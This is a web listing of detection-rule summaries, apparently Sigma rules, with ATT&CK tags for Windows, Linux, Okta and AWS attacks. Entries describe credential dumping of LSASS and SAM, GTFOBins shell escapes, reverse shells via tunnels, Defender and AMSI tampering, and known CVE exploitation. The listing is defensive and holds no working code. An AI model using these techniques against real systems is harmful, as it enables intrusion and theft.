Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.

Read More
Windows Defender Real-time Protection Disabled

Sep 22, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain a lot of information on who initiated this action you might want to reduce it to a "medium" level if this occurs too many times in your environment

Read More
Detect MeshAgent Command Execution via MeshCentral

Sep 21, 2024 · attack.command_and_control attack.t1219 ·
Share on:

Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.

Read More
Search for Antivirus process

Sep 20, 2024 ·
Share on:

Search for Antivirus process

Read More
Network Connection Initiated To BTunnels Domains

Sep 13, 2024 · attack.exfiltration attack.t1567.001 ·
Share on:

Detects network connections to BTunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

Read More
PwnKit Local Privilege Escalation

Sep 13, 2024 · attack.privilege-escalation attack.t1548.001 ·
Share on:

Detects potential PwnKit exploitation CVE-2021-4034 in auth logs

Read More
UNC2452 Process Creation Patterns

Sep 13, 2024 · attack.execution attack.t1059.001 detection.emerging-threats ·
Share on:

Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries

Read More
CVE-2021-1675 Print Spooler Exploitation Filename Pattern

Sep 13, 2024 · attack.execution attack.privilege-escalation attack.resource-development attack.t1587 cve.2021-1675 detection.emerging-threats ·
Share on:

Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675

Read More
HackTool - DInjector PowerShell Cradle Execution

Sep 13, 2024 · attack.defense-evasion attack.t1055 ·
Share on:

Detects the use of the Dinject PowerShell cradle based on the specific flags

Read More
InstallerFileTakeOver LPE CVE-2021-41379 File Create Event

Sep 13, 2024 · attack.privilege-escalation attack.t1068 detection.emerging-threats ·
Share on:

Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file

Read More
LPE InstallerFileTakeOver PoC CVE-2021-41379

Sep 13, 2024 · attack.initial-access attack.t1190 detection.emerging-threats ·
Share on:

Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379

Read More
Possible CVE-2021-1675 Print Spooler Exploitation

Sep 13, 2024 · attack.execution attack.t1569 cve.2021-1675 detection.emerging-threats ·
Share on:

Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675

Read More
Potential PrintNightmare Exploitation Attempt

Sep 13, 2024 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.t1574 cve.2021-1675 ·
Share on:

Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675

Read More
Potential RDP Exploit CVE-2019-0708

Sep 13, 2024 · attack.lateral-movement attack.t1210 car.2013-07-002 ·
Share on:

Detect suspicious error on protocol RDP, potential CVE-2019-0708

Read More
Potential SAM Database Dump

Sep 13, 2024 · attack.credential-access attack.t1003.002 ·
Share on:

Detects the creation of files that look like exports of the local SAM (Security Account Manager)

Read More
Scanner PoC for CVE-2019-0708 RDP RCE Vuln

Sep 13, 2024 · attack.lateral-movement attack.t1210 car.2013-07-002 ·
Share on:

Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep

Read More
Suspicious Rejected SMB Guest Logon From IP

Sep 13, 2024 · attack.credential-access attack.t1110.001 ·
Share on:

Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service

Read More
Windows Spooler Service Suspicious Binary Load

Sep 13, 2024 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.t1574 cve.2021-1675 cve.2021-34527 ·
Share on:

Detect DLL Load from Spooler Service backup folder

Read More
Cicada Ransomware PSExec File Creation

Sep 9, 2024 · attack.lateral-movement attack.execution attack.t1570 attack.t1569 attack.t1569.002 attack.s0029 ·
Share on:

Detects creation of a lightly-renamed PSExec file in C:\Users\Public, as observed in the Cicada3301 Ransomware report from MorphiSec.

Read More
Cicada3301 Ransomware Execution via PSExec

Sep 9, 2024 · attack.execution attack.t1569 attack.t1569.002 attack.s0029 ·
Share on:

Detects the use of a potentially-renamed psexec to run the Cicada3301 ransomware tool.

Read More
Hyper-V Virtual Machine Discovery Shutdown via Powershell Cmdlets

Sep 9, 2024 · attack.defense-evasion attack.impact attack.t1578 attack.t1578.003 attack.t1529 ·
Share on:

Detects powershell process used to find and shut down local Hyper-V VMs using the Stop-VM cmdlet, as documented in the 2024 Morphisec report on Cicada3301 ransomware.

Read More
IISReset Used to Stop IIS Services

Sep 9, 2024 · attack.impact attack.defense-evasion attack.t1562 attack.t1562.001 attack.t1529 ·
Share on:

Detects the use of the iisreset.exe utility to stop IIS web services. This is used to prevent users from accessing IIS web resources, thereby releasing/preventing locks which could inhibit ransomware-related encryption.

Read More
Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image

Sep 6, 2024 · attack.defense-evasion attack.t1027 ·
Share on:

Detects potential commandline obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

Read More
Potential Defense Evasion Via Right-to-Left Override

Sep 6, 2024 · attack.defense-evasion attack.t1036.002 ·
Share on:

Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This is used as an obfuscation and masquerading techniques.

Read More
Startup/Logon Script Added to Group Policy Object

Sep 6, 2024 · attack.privilege-escalation attack.t1484.001 attack.t1547 ·
Share on:

Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.

Read More
Persistence and Execution at Scale via GPO Scheduled Task

Sep 6, 2024 · attack.persistence attack.lateral-movement attack.t1053.005 ·
Share on:

Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale

Read More
Group Policy Abuse for Privilege Addition

Sep 6, 2024 · attack.privilege-escalation attack.t1484.001 ·
Share on:

Detects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins.

Read More
Process Deletion of Its Own Executable

Sep 3, 2024 · attack.defense-evasion ·
Share on:

Detects the deletion of a process's executable by itself. This is usually not possible without workarounds and may be used by malware to hide its traces.

Read More
Dism Remove Online Package

Sep 3, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images

Read More
PowerShell Web Access Feature Enabled Via DISM

Sep 3, 2024 · attack.persistence attack.t1548.002 ·
Share on:

Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse

Read More
PowerShell Web Access Installation - PsScript

Sep 3, 2024 · attack.persistence attack.t1059.001 ·
Share on:

Detects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse

Read More
Capsh Shell Invocation - Linux

Sep 2, 2024 · attack.execution attack.t1059 ·
Share on:

Detects the use of the "capsh" utility to invoke a shell.

Read More
Inline Python Execution - Spawn Shell Via OS System Library

Sep 2, 2024 · attack.execution attack.t1059 ·
Share on:

Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell.

Read More
Shell Execution GCC - Linux

Sep 2, 2024 · attack.discovery attack.t1083 ·
Share on:

Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

Read More
Shell Execution via Find - Linux

Sep 2, 2024 · attack.discovery attack.t1083 ·
Share on:

Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.

Read More
Shell Execution via Flock - Linux

Sep 2, 2024 · attack.discovery attack.t1083 ·
Share on:

Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

Read More
Shell Execution via Git - Linux

Sep 2, 2024 · attack.execution attack.t1059 ·
Share on:

Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

Read More
Shell Execution via Nice - Linux

Sep 2, 2024 · attack.discovery attack.t1083 ·
Share on:

Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

Read More
Shell Invocation via Apt - Linux

Sep 2, 2024 · attack.discovery attack.t1083 ·
Share on:

Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

Read More
Shell Invocation via Env Command - Linux

Sep 2, 2024 · attack.execution attack.t1059 ·
Share on:

Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.

Read More
Shell Invocation Via Ssh - Linux

Sep 2, 2024 · attack.execution attack.t1059 ·
Share on:

Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

Read More
Suspicious Invocation of Shell via AWK - Linux

Sep 2, 2024 · attack.execution attack.t1059 ·
Share on:

Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.

Read More
Vim GTFOBin Abuse - Linux

Sep 2, 2024 · attack.discovery attack.t1083 ·
Share on:

Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.

Read More
AWS S3 Bucket Versioning Disable

Sep 2, 2024 · attack.impact attack.t1490 ·
Share on:

Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects.

Read More
Certificate Use With No Strong Mapping

Sep 2, 2024 · attack.privilege-escalation ·
Share on:

Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID) This could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping. Events where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing.

Read More
ChromeLoader Malware Execution

Sep 2, 2024 · attack.execution attack.persistence attack.t1053.005 attack.t1059.001 attack.t1176 detection.emerging-threats ·
Share on:

Detects execution of ChromeLoader malware via a registered scheduled task

Read More
DarkGate - Autoit3.EXE Execution Parameters

Sep 2, 2024 · attack.execution attack.t1059 detection.emerging-threats ·
Share on:

Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate command-and-control server.

Read More
DarkGate - Autoit3.EXE File Creation By Uncommon Process

Sep 2, 2024 · attack.command-and-control attack.execution attack.t1105 attack.t1059 detection.emerging-threats ·
Share on:

Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.

Read More
DarkGate - User Created Via Net.EXE

Sep 2, 2024 · attack.persistence attack.t1136.001 detection.emerging-threats ·
Share on:

Detects creation of local users via the net.exe command with the name of "DarkGate"

Read More
Diamond Sleet APT DLL Sideloading Indicators

Sep 2, 2024 · attack.defense-evasion attack.t1574.002 detection.emerging-threats ·
Share on:

Detects DLL sideloading activity seen used by Diamond Sleet APT

Read More
Diamond Sleet APT DNS Communication Indicators

Sep 2, 2024 · attack.command-and-control detection.emerging-threats ·
Share on:

Detects DNS queries related to Diamond Sleet APT activity

Read More
Diamond Sleet APT File Creation Indicators

Sep 2, 2024 · attack.execution detection.emerging-threats ·
Share on:

Detects file creation activity that is related to Diamond Sleet APT activity

Read More
Diamond Sleet APT Process Activity Indicators

Sep 2, 2024 · attack.execution detection.emerging-threats ·
Share on:

Detects process creation activity indicators related to Diamond Sleet APT

Read More
Diamond Sleet APT Scheduled Task Creation

Sep 2, 2024 · attack.execution attack.privilege-escalation attack.persistence attack.t1053.005 detection.emerging-threats ·
Share on:

Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability

Read More
Diamond Sleet APT Scheduled Task Creation - Registry

Sep 2, 2024 · attack.defense-evasion attack.t1562 detection.emerging-threats ·
Share on:

Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability

Read More
Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback

Sep 2, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.

Read More
Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC

Sep 2, 2024 · attack.execution attack.lateral-movement attack.t1210 cve.2020-1472 detection.emerging-threats ·
Share on:

Detects the execution of the commonly used ZeroLogon PoC executable.

Read More
Exploitation Indicators Of CVE-2023-20198

Sep 2, 2024 · attack.privilege-escalation attack.initial-access detection.emerging-threats ·
Share on:

Detecting exploitation indicators of CVE-2023-20198 a privilege escalation vulnerability in Cisco IOS XE Software Web UI.

Read More
File Download From IP Based URL Via CertOC.EXE

Sep 2, 2024 · attack.command-and-control attack.execution attack.t1105 ·
Share on:

Detects when a user downloads a file from an IP based URL using CertOC.exe

Read More
File Download From IP URL Via Curl.EXE

Sep 2, 2024 · attack.execution ·
Share on:

Detects file downloads directly from IP address URL using curl.exe

Read More
HackTool - CoercedPotato Named Pipe Creation

Sep 2, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055 ·
Share on:

Detects the pattern of a pipe name as used by the hack tool CoercedPotato

Read More
Injected Browser Process Spawning Rundll32 - GuLoader Activity

Sep 2, 2024 · attack.defense-evasion attack.t1055 detection.emerging-threats ·
Share on:

Detects the execution of installed GuLoader malware on the host. GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process.

Read More
Kerberoasting Activity - Initial Query

Sep 2, 2024 · attack.credential-access attack.t1558.003 ·
Share on:

This rule will collect the data needed to start looking into possible kerberoasting activity. Further analysis or computation within the query is needed focusing on requests from one specific host/IP towards multiple service names within a time period of 5 seconds. You can then set a threshold for the number of requests and time between the requests to turn this into an alert.

Read More
Lazarus APT DLL Sideloading Activity

Sep 2, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1574.001 attack.t1574.002 attack.g0032 detection.emerging-threats ·
Share on:

Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company

Read More
LSASS Process Memory Dump Creation Via Taskmgr.EXE

Sep 2, 2024 · attack.credential-access attack.t1003.001 ·
Share on:

Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.

Read More
New Okta User Created

Sep 2, 2024 · attack.credential-access ·
Share on:

Detects new user account creation

Read More
Obfuscated IP Via CLI

Sep 2, 2024 · attack.discovery ·
Share on:

Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line

Read More
Obfuscated PowerShell OneLiner Execution

Sep 2, 2024 · attack.defense-evasion attack.execution attack.t1059.001 attack.t1562.001 ·
Share on:

Detects the execution of a specific OneLiner to download and execute powershell modules in memory.

Read More
Okta 2023 Breach Indicator Of Compromise

Sep 2, 2024 · attack.credential-access detection.emerging-threats ·
Share on:

Detects new user account creation or activation with specific names related to the Okta Support System 2023 breach. This rule can be enhanced by filtering out known and legitimate username used in your environnement.

Read More
Okta Admin Functions Access Through Proxy

Sep 2, 2024 · attack.credential-access ·
Share on:

Detects access to Okta admin functions through proxy.

Read More
OneNote.EXE Execution of Malicious Embedded Scripts

Sep 2, 2024 · attack.defense-evasion attack.t1218.001 ·
Share on:

Detects the execution of malicious OneNote documents that contain embedded scripts. When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.

Read More
Onyx Sleet APT File Creation Indicators

Sep 2, 2024 · attack.execution detection.emerging-threats ·
Share on:

Detects file creation activity that is related to Onyx Sleet APT activity

Read More
Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon

Sep 2, 2024 · attack.initial-access attack.t1190 cve.2021-44228 detection.emerging-threats ·
Share on:

Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j.

Read More
Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution

Sep 2, 2024 · attack.execution attack.initial-access attack.t1059.006 attack.t1190 cve.2022-22954 detection.emerging-threats ·
Share on:

Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.

Read More
Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader

Sep 2, 2024 · attack.persistence attack.t1505.001 cve.2023-27363 detection.emerging-threats ·
Share on:

Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.

Read More
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1

Sep 2, 2024 · attack.defense-evasion ·
Share on:

Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.

Read More
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2

Sep 2, 2024 · attack.defense-evasion ·
Share on:

Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.

Read More
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3

Sep 2, 2024 · attack.defense-evasion ·
Share on:

Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.

Read More
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4

Sep 2, 2024 · attack.defense-evasion ·
Share on:

Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.

Read More
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream

Sep 2, 2024 · attack.defense-evasion attack.t1564.004 ·
Share on:

Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"

Read More
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI

Sep 2, 2024 · attack.defense-evasion attack.t1564.004 ·
Share on:

Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"

Read More
Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy

Sep 2, 2024 · attack.initial-access attack.t1190 cve.2023-43621 detection.emerging-threats ·
Share on:

Detects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in proxy logs.

Read More
Potential Information Disclosure CVE-2023-43261 Exploitation - Web

Sep 2, 2024 · attack.initial-access attack.t1190 cve.2023-43621 detection.emerging-threats ·
Share on:

Detects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in access logs.

Read More
Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE

Sep 2, 2024 · attack.execution attack.t1059 cve.2023-34362 detection.emerging-threats ·
Share on:

Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files.

MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\([a-z0-9]{5,12})\([a-z0-9]{5,12})\App_Web_[a-z0-9]{5,12}.dll.

Hunting Opportunity

Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.

Read More
Potential Okta Password in AlternateID Field

Sep 2, 2024 · attack.credential-access attack.t1552 ·
Share on:

Detects when a user has potentially entered their password into the username field, which will cause the password to be retained in log files.

Read More
Potentially Suspicious Child Process Of VsCode

Sep 2, 2024 · attack.execution attack.defense-evasion attack.t1218 attack.t1202 ·
Share on:

Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.

Read More
Potentially Suspicious Office Document Executed From Trusted Location

Sep 2, 2024 · attack.defense-evasion attack.t1202 ·
Share on:

Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code.

Read More
PowerShell Module File Created By Non-PowerShell Process

Sep 2, 2024 · attack.persistence ·
Share on:

Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process

Read More
PowerShell Script Execution Policy Enabled

Sep 2, 2024 · attack.execution ·
Share on:

Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.

Read More
Python Function Execution Security Warning Disabled In Excel

Sep 2, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.

Read More
Raspberry Robin Initial Execution From External Drive

Sep 2, 2024 · attack.execution attack.t1059.001 detection.emerging-threats ·
Share on:

Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE".

Read More
Raspberry Robin Subsequent Execution of Commands

Sep 2, 2024 · attack.execution attack.t1059.001 detection.emerging-threats ·
Share on:

Detects raspberry robin subsequent execution of commands.

Read More
Remote Access Tool - ScreenConnect Command Execution

Sep 2, 2024 · attack.execution attack.t1059.003 ·
Share on:

Detects command execution via ScreenConnect RMM

Read More
Remote Access Tool - ScreenConnect File Transfer

Sep 2, 2024 · attack.execution attack.t1059.003 ·
Share on:

Detects file being transferred via ScreenConnect RMM

Read More
Remote Access Tool - ScreenConnect Temporary File

Sep 2, 2024 · attack.execution attack.t1059.003 ·
Share on:

Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users<username>\Documents\ConnectWiseControl\Temp" before execution.

Read More
Renamed CURL.EXE Execution

Sep 2, 2024 · attack.execution attack.t1059 attack.defense-evasion attack.t1202 ·
Share on:

Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields

Read More
Renamed VsCode Code Tunnel Execution - File Indicator

Sep 2, 2024 · attack.command-and-control ·
Share on:

Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode.

Read More
Security Software Discovery Via Powershell Script

Sep 2, 2024 · attack.discovery attack.t1518.001 ·
Share on:

Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes. Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus

Read More
Serpent Backdoor Payload Execution Via Scheduled Task

Sep 2, 2024 · attack.execution attack.persistence attack.t1053.005 attack.t1059.006 detection.emerging-threats ·
Share on:

Detects post exploitation execution technique of the Serpent backdoor. According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.

Read More
Suspicious LNK Double Extension File Created

Sep 2, 2024 · attack.defense-evasion attack.t1036.007 ·
Share on:

Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.

Read More
Suspicious Sysmon as Execution Parent

Sep 2, 2024 · attack.privilege-escalation attack.t1068 cve.2022-41120 detection.emerging-threats ·
Share on:

Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)

Read More
Ursnif Redirection Of Discovery Commands

Sep 2, 2024 · attack.execution attack.t1059 detection.emerging-threats ·
Share on:

Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware.

Read More
Visual Studio Code Tunnel Execution

Sep 2, 2024 · attack.command-and-control attack.t1071.001 ·
Share on:

Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel

Read More
Visual Studio Code Tunnel Remote File Creation

Sep 2, 2024 · attack.command-and-control ·
Share on:

Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature

Read More
Visual Studio Code Tunnel Service Installation

Sep 2, 2024 · attack.command-and-control attack.t1071.001 ·
Share on:

Detects the installation of VsCode tunnel (code-tunnel) as a service.

Read More
Visual Studio Code Tunnel Shell Execution

Sep 2, 2024 · attack.command-and-control attack.t1071.001 ·
Share on:

Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.

Read More
A Rule Has Been Deleted From The Windows Firewall Exception List

Aug 29, 2024 · attack.defense-evasion attack.t1562.004 ·
Share on:

Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall

Read More
Uncommon New Firewall Rule Added In Windows Firewall Exception List

Aug 29, 2024 · attack.defense-evasion attack.t1562.004 ·
Share on:

Detects when a rule has been added to the Windows Firewall exception list

Read More
System Network Discovery - macOS

Aug 29, 2024 · attack.discovery attack.t1016 ·
Share on:

Detects enumeration of local network configuration

Read More
Antivirus Filter Driver Disallowed On Dev Drive - Registry

Aug 29, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".

Read More
Emotet Loader Execution Via .LNK File

Aug 29, 2024 · attack.execution attack.t1059.006 detection.emerging-threats ·
Share on:

Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022. The ".lnk" file was delivered via phishing campaign.

Read More
FakeUpdates/SocGholish Activity

Aug 29, 2024 · attack.execution attack.t1059.001 detection.emerging-threats ·
Share on:

Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell.

Read More
File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell

Aug 29, 2024 · attack.discovery attack.t1135 ·
Share on:

Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder.

Read More
HackTool - SharpWSUS/WSUSpendu Execution

Aug 29, 2024 · attack.execution attack.lateral-movement attack.t1210 ·
Share on:

Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.

Read More
Hiding User Account Via SpecialAccounts Registry Key

Aug 29, 2024 · attack.defense-evasion attack.t1564.002 ·
Share on:

Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.

Read More
Hiding User Account Via SpecialAccounts Registry Key - CommandLine

Aug 29, 2024 · attack.t1564.002 ·
Share on:

Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.

Read More
Potential AMSI Bypass Via .NET Reflection

Aug 29, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning

Read More
Potential CVE-2022-29072 Exploitation Attempt

Aug 29, 2024 · attack.execution cve.2022-29072 detection.emerging-threats ·
Share on:

Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process.

Read More
Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity

Aug 29, 2024 · attack.initial-access attack.t1190 cve.2023-34362 detection.emerging-threats ·
Share on:

Detects file indicators of potential exploitation of MOVEit CVE-2023-34362.

Read More
Potential Privilege Escalation via Local Kerberos Relay over LDAP

Aug 29, 2024 · attack.privilege-escalation attack.credential-access attack.t1548 ·
Share on:

Detects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account. This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.

Read More
Python Function Execution Security Warning Disabled In Excel - Registry

Aug 29, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.

Read More
RestrictedAdminMode Registry Value Tampering

Aug 29, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise

Read More
RestrictedAdminMode Registry Value Tampering - ProcCreation

Aug 29, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise

Read More
Sdiagnhost Calling Suspicious Child Process

Aug 29, 2024 · attack.defense-evasion attack.t1036 attack.t1218 ·
Share on:

Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)

Read More
